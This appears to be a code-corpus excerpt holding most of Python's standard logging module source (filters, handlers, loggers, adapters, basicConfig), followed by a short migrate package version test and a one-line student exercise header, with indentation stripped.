records as desired. The base filter class only allows events which are
below a certain point in the logger hierarchy. For example, a filter
initialized with "A.B" will allow events logged by loggers "A.B",
"A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
initialized with the empty string, all events are passed.
"""
def __init__(self, name=''):
"""
Initialize a filter.
Initialize with the name of the logger which, together with its
children, will have its events allowed through the filter. If no
name is specified, allow every event.
"""
self.name = name
self.nlen = len(name)
def filter(self, record):
"""
Determine if the specified record is to be logged.
Is the specified record to be logged? Returns 0 for no, nonzero for
yes. If deemed appropriate, the record may be modified in-place.
"""
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
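# Illustrative sketch (not part of the original module): the base Filter
# does dotted-prefix matching on logger names, not substring matching:
#
#   f = Filter('A.B')
#   f.filter(makeLogRecord({'name': 'A.B'}))     # True  (exact match)
#   f.filter(makeLogRecord({'name': 'A.B.C'}))   # True  (child logger)
#   f.filter(makeLogRecord({'name': 'A.BB'}))    # False (not a child)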
class Filterer(object):
"""
A base class for loggers and handlers which allows them to share
common code.
"""
def __init__(self):
"""
Initialize the list of filters to be an empty list.
"""
self.filters = []
def addFilter(self, filter):
"""
Add the specified filter to this handler.
"""
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
"""
Remove the specified filter from this handler.
"""
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
"""
Determine if a record is loggable by consulting all the filters.
The default is to allow the record to be logged; any filter can veto
this and the record is then dropped. Returns a zero value if a record
is to be dropped, else non-zero.
        .. versionchanged:: 3.2
Allow filters to be just callables.
"""
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
"""
Remove a handler reference from the internal cleanup list.
"""
# This function can be called during module teardown, when globals are
# set to None. It can also be called from another thread. So we need to
# pre-emptively grab the necessary globals and check if they're None,
# to prevent race conditions and failures during interpreter shutdown.
acquire, release, handlers = _acquireLock, _releaseLock, _handlerList
if acquire and release and handlers:
acquire()
try:
if wr in handlers:
handlers.remove(wr)
finally:
release()
def _addHandlerRef(handler):
"""
Add a handler to the internal cleanup list using a weak reference.
"""
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
"""
Handler instances dispatch logging events to specific destinations.
The base handler class. Acts as a placeholder which defines the Handler
interface. Handlers can optionally use Formatter instances to format
records as desired. By default, no formatter is specified; in this case,
the 'raw' message as determined by record.message is logged.
"""
def __init__(self, level=NOTSET):
"""
Initializes the instance - basically setting the formatter to None
and the filter list to empty.
"""
Filterer.__init__(self)
self._name = None
self.level = _checkLevel(level)
self.formatter = None
# Add the handler to the global _handlerList (for cleanup on shutdown)
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
"""
Acquire a thread lock for serializing access to the underlying I/O.
"""
if threading:
self.lock = threading.RLock()
else: #pragma: no cover
self.lock = None
def acquire(self):
"""
Acquire the I/O thread lock.
"""
if self.lock:
self.lock.acquire()
def release(self):
"""
Release the I/O thread lock.
"""
if self.lock:
self.lock.release()
def setLevel(self, level):
"""
Set the logging level of this handler. level must be an int or a str.
"""
self.level = _checkLevel(level)
def format(self, record):
"""
Format the specified record.
If a formatter is set, use it. Otherwise, use the default formatter
for the module.
"""
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
"""
Do whatever it takes to actually log the specified logging record.
This version is intended to be implemented by subclasses and so
raises a NotImplementedError.
"""
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
def handle(self, record):
"""
Conditionally emit the specified logging record.
Emission depends on filters which may have been added to the handler.
Wrap the actual emission of the record with acquisition/release of
the I/O thread lock. Returns whether the filter passed the record for
emission.
"""
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
"""
Set the formatter for this handler.
"""
self.formatter = fmt
def flush(self):
"""
Ensure all logging output has been flushed.
This version does nothing and is intended to be implemented by
subclasses.
"""
pass
def close(self):
"""
Tidy up any resources used by the handler.
This version removes the handler from an internal map of handlers,
_handlers, which is used for handler lookup by name. Subclasses
should ensure that this gets called from overridden close()
methods.
"""
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
This method should be called from handlers when an exception is
encountered during an emit() call. If raiseExceptions is false,
exceptions get silently ignored. This is what is mostly wanted
for a logging system - most users will not care about errors in
the logging system, they are more interested in application errors.
You could, however, replace this with a custom handler if you wish.
The record which was being processed is passed in to this method.
"""
if raiseExceptions and sys.stderr: # see issue 13807
t, v, tb = sys.exc_info()
try:
sys.stderr.write('--- Logging error ---\n')
traceback.print_exception(t, v, tb, None, sys.stderr)
sys.stderr.write('Call stack:\n')
# Walk the stack frame up until we're out of logging,
# so as to print the calling context.
frame = tb.tb_frame
while (frame and os.path.dirname(frame.f_code.co_filename) ==
__path__[0]):
frame = frame.f_back
if frame:
traceback.print_stack(frame, file=sys.stderr)
else:
# couldn't find the right stack frame, for some reason
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
# Issue 18671: output logging message and arguments
try:
sys.stderr.write('Message: %r\n'
'Arguments: %s\n' % (record.msg,
record.args))
except Exception:
sys.stderr.write('Unable to print the message and arguments'
' - possible formatting error.\nUse the'
' traceback above to help find the error.\n'
)
except OSError: #pragma: no cover
pass # see issue 5971
finally:
del t, v, tb
class StreamHandler(Handler):
"""
A handler class which writes logging records, appropriately formatted,
to a stream. Note that this class does not close the stream, as
sys.stdout or sys.stderr may be used.
"""
terminator = '\n'
def __init__(self, stream=None):
"""
Initialize the handler.
If stream is not specified, sys.stderr is used.
"""
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
"""
Flushes the stream.
"""
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
"""
Emit a record.
If a formatter is specified, it is used to format the record.
The record is then written to the stream with a trailing newline. If
exception information is present, it is formatted using
traceback.print_exception and appended to the stream. If the stream
has an 'encoding' attribute, it is used to determine how to do the
output to the stream.
"""
try:
msg = self.format(record)
stream = self.stream
stream.write(msg)
stream.write(self.terminator)
self.flush()
except Exception:
self.handleError(record)
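# Illustrative sketch (not part of the original module): a StreamHandler
# writing to an in-memory stream, showing format + terminator behaviour:
#
#   buf = io.StringIO()
#   h = StreamHandler(buf)
#   h.setFormatter(Formatter('%(levelname)s:%(message)s'))
#   h.emit(makeLogRecord({'levelname': 'INFO', 'msg': 'ready'}))
#   buf.getvalue()   # 'INFO:ready\n'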
class FileHandler(StreamHandler):
"""
A handler class which writes formatted logging records to disk files.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
"""
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.delay = delay
if delay:
#We don't open the stream, but we still need to call the
#Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
"""
Closes the stream.
"""
self.acquire()
try:
if self.stream:
self.flush()
if hasattr(self.stream, "close"):
self.stream.close()
self.stream = None
# Issue #19523: call unconditionally to
# prevent a handler leak when delay is set
StreamHandler.close(self)
finally:
self.release()
def _open(self):
"""
Open the current base file with the (original) mode and encoding.
Return the resulting stream.
"""
return open(self.baseFilename, self.mode, encoding=self.encoding)
def emit(self, record):
"""
Emit a record.
If the stream was not opened because 'delay' was specified in the
constructor, open it before calling the superclass's emit.
"""
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
class _StderrHandler(StreamHandler):
"""
This class is like a StreamHandler using sys.stderr, but always uses
whatever sys.stderr is currently set to rather than the value of
sys.stderr at handler construction time.
"""
def __init__(self, level=NOTSET):
"""
Initialize the handler.
"""
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder(object):
"""
PlaceHolder instances are used in the Manager logger hierarchy to take
the place of nodes for which no loggers have been defined. This class is
intended for internal use only and not as part of the public API.
"""
def __init__(self, alogger):
"""
Initialize with the specified logger being a child of this placeholder.
"""
self.loggerMap = { alogger : None }
def append(self, alogger):
"""
Add the specified logger as a child of this placeholder.
"""
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
_loggerClass = None
def setLoggerClass(klass):
"""
Set the class to be used when instantiating a logger. The class should
define __init__() such that only a name argument is required, and the
__init__() should call Logger.__init__()
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
def getLoggerClass():
"""
Return the class to be used when instantiating a logger.
"""
return _loggerClass
class Manager(object):
"""
There is [under normal circumstances] just one Manager instance, which
holds the hierarchy of loggers.
"""
def __init__(self, rootnode):
"""
Initialize the manager with the root node of the logger hierarchy.
"""
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
"""
Get a logger with the specified name (channel name), creating it
if it doesn't yet exist. This name is a dot-separated hierarchical
name, such as "a", "a.b", "a.b.c" or similar.
If a PlaceHolder existed for the specified name [i.e. the logger
didn't exist but a child of it did], replace it with the created
logger and fix up the parent/child references which pointed to the
placeholder to now point to the logger.
"""
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def setLoggerClass(self, klass):
"""
Set the class to be used when instantiating a logger with this Manager.
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
"""
Set the factory to be used when instantiating a log record with this
Manager.
"""
self.logRecordFactory = factory
def _fixupParents(self, alogger):
"""
Ensure that there are either loggers or placeholders all the way
from the specified logger to the root of the logger hierarchy.
"""
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
"""
Ensure that children of the placeholder ph are connected to the
specified logger.
"""
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
            #The if means ... if not c.parent.name.startswith(name)
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
"""
Instances of the Logger class represent a single logging channel. A
"logging channel" indicates an area of an application. Exactly how an
"area" is defined is up to the application developer. Since an
application can have any number of areas, logging channels are identified
by a unique string. Application areas can be nested (e.g. an area
of "input processing" might include sub-areas "read CSV files", "read
XLS files" and "read Gnumeric files"). To cater for this natural nesting,
channel names are organized into a namespace hierarchy where levels are
separated by periods, much like the Java or Python package namespace. So
in the instance given above, channel names might be "input" for the upper
level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
There is no arbitrary limit to the depth of nesting.
"""
def __init__(self, name, level=NOTSET):
"""
Initialize the logger with a name and an optional level.
"""
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
def setLevel(self, level):
"""
Set the logging level of this logger. level must be an int or a str.
"""
self.level = _checkLevel(level)
def debug(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'DEBUG'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
"""
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'INFO'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
"""
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'WARNING'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
"""
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'ERROR'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.error("Houston, we have a %s", "major problem", exc_info=1)
"""
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Convenience method for logging an ERROR with exception information.
"""
kwargs['exc_info'] = True
self.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'CRITICAL'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
"""
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
fatal = critical
def log(self, level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
"""
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False):
"""
Find the stack frame of the caller so that we can note the source
file name, line number and function name.
"""
f = currentframe()
#On some versions of IronPython, currentframe() returns None if
#IronPython isn't run with -X:Frames.
if f is not None:
f = f.f_back
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""
A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
"""
Low-level logging routine which creates a LogRecord and then calls
all the handlers of this logger to handle the record.
"""
sinfo = None
if _srcfile:
#IronPython doesn't track Python frames, so findCaller raises an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func, sinfo = self.findCaller(stack_info)
except ValueError: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
"""
Call the handlers for the specified record.
This method is used for unpickled records received from a socket, as
well as those created locally. Logger-level filtering is applied.
"""
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
"""
Add the specified handler to this logger.
"""
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
"""
Remove the specified handler from this logger.
"""
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
"""
See if this logger has any handlers configured.
Loop through all handlers for this logger and its parents in the
logger hierarchy. Return True if a handler was found, else False.
Stop searching up the hierarchy whenever a logger with the "propagate"
attribute set to zero is found - that will be the last logger which
is checked for the existence of handlers.
"""
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
"""
Pass a record to all relevant handlers.
Loop through all handlers for this logger and its parents in the
logger hierarchy. If no handler was found, output a one-off error
message to sys.stderr. Stop searching up the hierarchy whenever a
logger with the "propagate" attribute set to zero is found - that
will be the last logger whose handlers are called.
"""
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None #break out
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
"""
Get the effective level for this logger.
Loop through this logger and its parents in the logger hierarchy,
looking for a non-zero logging level. Return the first one found.
"""
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getChild(self, suffix):
"""
Get a logger which is a descendant to this one.
This is a convenience method, such that
logging.getLogger('abc').getChild('def.ghi')
is the same as
logging.getLogger('abc.def.ghi')
It's useful, for example, when the parent logger is named using
__name__ rather than a literal string.
"""
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
class RootLogger(Logger):
"""
A root logger is not that different to any other logger, except that
it must have a logging level and there is only one instance of it in
the hierarchy.
"""
def __init__(self, level):
"""
Initialize the logger with the name "root".
"""
Logger.__init__(self, "root", level)
_loggerClass = Logger
class LoggerAdapter(object):
"""
An adapter for loggers which makes it easier to specify contextual
information in logging output.
"""
def __init__(self, logger, extra):
"""
Initialize the adapter with a logger and a dict-like object which
provides contextual information. This constructor signature allows
easy stacking of LoggerAdapters, if so desired.
You can effectively pass keyword arguments as shown in the
following example:
adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
"""
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
"""
Process the logging message and keyword arguments passed in to
a logging call to insert contextual information. You can either
manipulate the message itself, the keyword args or both. Return
the message and kwargs modified (or not) to suit your needs.
Normally, you'll only need to override this one method in a
LoggerAdapter subclass for your specific needs.
"""
kwargs["extra"] = self.extra
return msg, kwargs
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
"""
Delegate a debug call to the underlying logger.
"""
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Delegate an info call to the underlying logger.
"""
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Delegate a warning call to the underlying logger.
"""
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Delegate an error call to the underlying logger.
"""
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Delegate an exception call to the underlying logger.
"""
kwargs["exc_info"] = True
self.log(ERROR, msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Delegate a critical call to the underlying logger.
"""
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Delegate a log call to the underlying logger, after adding
contextual information from this adapter instance.
"""
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def setLevel(self, level):
"""
Set the specified level on the underlying logger.
"""
self.logger.setLevel(level)
def getEffectiveLevel(self):
"""
Get the effective level for the underlying logger.
"""
return self.logger.getEffectiveLevel()
def hasHandlers(self):
"""
See if the underlying logger has any handlers.
"""
return self.logger.hasHandlers()
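# Illustrative sketch (not part of the original module): a LoggerAdapter
# injecting per-connection context; process() makes every delegated call
# carry the adapter's ``extra`` dict:
#
#   base = getLogger('net')
#   adapter = LoggerAdapter(base, {'ip': '10.0.0.1'})
#   adapter.warning('reset by peer')
#   # with a handler format such as '%(ip)s %(message)s' the record
#   # now formats as '10.0.0.1 reset by peer'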
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
def basicConfig(**kwargs):
"""
Do basic configuration for the logging system.
This function does nothing if the root logger already has handlers
configured. It is a convenience method intended for use by simple scripts
to do one-shot configuration of the logging package.
The default behaviour is to create a StreamHandler which writes to
sys.stderr, set a formatter using the BASIC_FORMAT format string, and
add the handler to the root logger.
A number of optional keyword arguments may be specified, which can alter
the default behaviour.
filename Specifies that a FileHandler be created, using the specified
filename, rather than a StreamHandler.
filemode Specifies the mode to open the file, if filename is specified
(if filemode is unspecified, it defaults to 'a').
format Use the specified format string for the handler.
datefmt Use the specified date/time format.
style If a format string is specified, use this to specify the
type of format string (possible values '%', '{', '$', for
%-formatting, :meth:`str.format` and :class:`string.Template`
- defaults to '%').
level Set the root logger level to the specified level.
stream Use the specified stream to initialize the StreamHandler. Note
that this argument is incompatible with 'filename' - if both
are present, 'stream' is ignored.
handlers If specified, this should be an iterable of already created
handlers, which will be added to the root handler. Any handler
in the list which does not have a formatter assigned will be
assigned the formatter created in this function.
Note that you could specify a stream created using open(filename, mode)
rather than passing the filename and mode in. However, it should be
remembered that StreamHandler does not close its stream (since it may be
using sys.stdout or sys.stderr), whereas FileHandler closes its stream
when the handler is closed.
.. versionchanged:: 3.2
Added the ``style`` parameter.
.. versionchanged:: 3.3
Added the ``handlers`` parameter. A ``ValueError`` is now thrown for
incompatible arguments (e.g. ``handlers`` specified together with
``filename``/``filemode``, or ``filename``/``filemode`` specified
together with ``stream``, or ``handlers`` specified together with
        ``stream``).
"""
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
if len(root.handlers) == 0:
handlers = kwargs.get("handlers")
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.get("filename")
if filename:
mode = kwargs.get("filemode", 'a')
h = FileHandler(filename, mode)
else:
stream = kwargs.get("stream")
h = StreamHandler(stream)
handlers = [h]
dfs = kwargs.get("datefmt", None)
style = kwargs.get("style", '%')
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
fs = kwargs.get("format", _STYLES[style][1])
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.get("level")
if level is not None:
root.setLevel(level)
finally:
_releaseLock()
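# Illustrative sketch (not part of the original module): the common one-shot
# configuration; a second call is a no-op because the root logger already
# has a handler by then:
#
#   basicConfig(level=DEBUG,
#               format='%(asctime)s %(levelname)s %(name)s: %(message)s')
#   getLogger('demo').debug('configured')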
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
"""
Return a logger with the specified name, creating it if necessary.
If no name is specified, return the root logger.
"""
if name:
return Logger.manager.getLogger(name)
else:
return root
def critical(msg, *args, **kwargs):
"""
Log a message with severity 'CRITICAL' on the root logger. If the logger
has no handlers, call basicConfig() to add a console handler with a
pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
fatal = critical
def error(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger, with exception
information. If the logger has no handlers, basicConfig() is called to add
a console handler with a pre-defined format.
"""
kwargs['exc_info'] = True
error(msg, *args, **kwargs)
def warning(msg, *args, **kwargs):
"""
Log a message with severity 'WARNING' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
"""
Log a message with severity 'INFO' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
"""
Log a message with severity 'DEBUG' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level' on the root logger. If
the logger has no handlers, call basicConfig() to add a console handler
with a pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level):
"""
Disable all logging calls of severity 'level' and below.
"""
root.manager.disable = level
def shutdown(handlerList=_handlerList):
"""
Perform any cleanup actions in the logging system (e.g. flushing
buffers).
Should be called at application exit.
"""
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (OSError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except: # ignore everything, as we're shutting down
if raiseExceptions:
raise
#else, swallow
#Let's try and shutdown automatically on application exit...
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
"""
This handler does nothing. It's intended to be used to avoid the
"No handlers could be found for logger XXX" one-off warning. This is
important for library code, which may contain code to log events. If a user
of the library does not configure logging, the one-off warning might be
produced; to avoid this, the library developer simply needs to instantiate
a NullHandler and add it to the top-level logger of the library module or
package.
"""
def handle(self, record):
"""Stub."""
def emit(self, record):
"""Stub."""
def createLock(self):
self.lock = None
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
Implementation of showwarnings which redirects to logging, which will first
check to see if the file parameter is None. If a file is specified, it will
delegate to the original warnings implementation of showwarning. Otherwise,
it will call warnings.formatwarning and will log the resulting string to a
warnings logger named "py.warnings" with level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
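# Illustrative sketch (not part of the original module): routing
# warnings.warn() output through the "py.warnings" logger and back:
#
#   captureWarnings(True)
#   warnings.warn('stale cache')   # logged via getLogger('py.warnings')
#   captureWarnings(False)         # restores the original warnings.showwarning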
|
fubecka/f5-dashboard
|
refs/heads/master
|
flask/lib/python2.6/site-packages/migrate/tests/__init__.py
|
78
|
# make this package available during imports as long as we support <python2.5
import sys
import os
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from unittest import TestCase
import migrate
import six
class TestVersionDefined(TestCase):
def test_version(self):
"""Test for migrate.__version__"""
self.assertTrue(isinstance(migrate.__version__, six.string_types))
self.assertTrue(len(migrate.__version__) > 0)
|
Mariaanisimova/pythonintask
|
refs/heads/master
|
INBa/2015/Mitin_D_S/task_8_15.py
|
1
|
# Task 8. Variant 15.
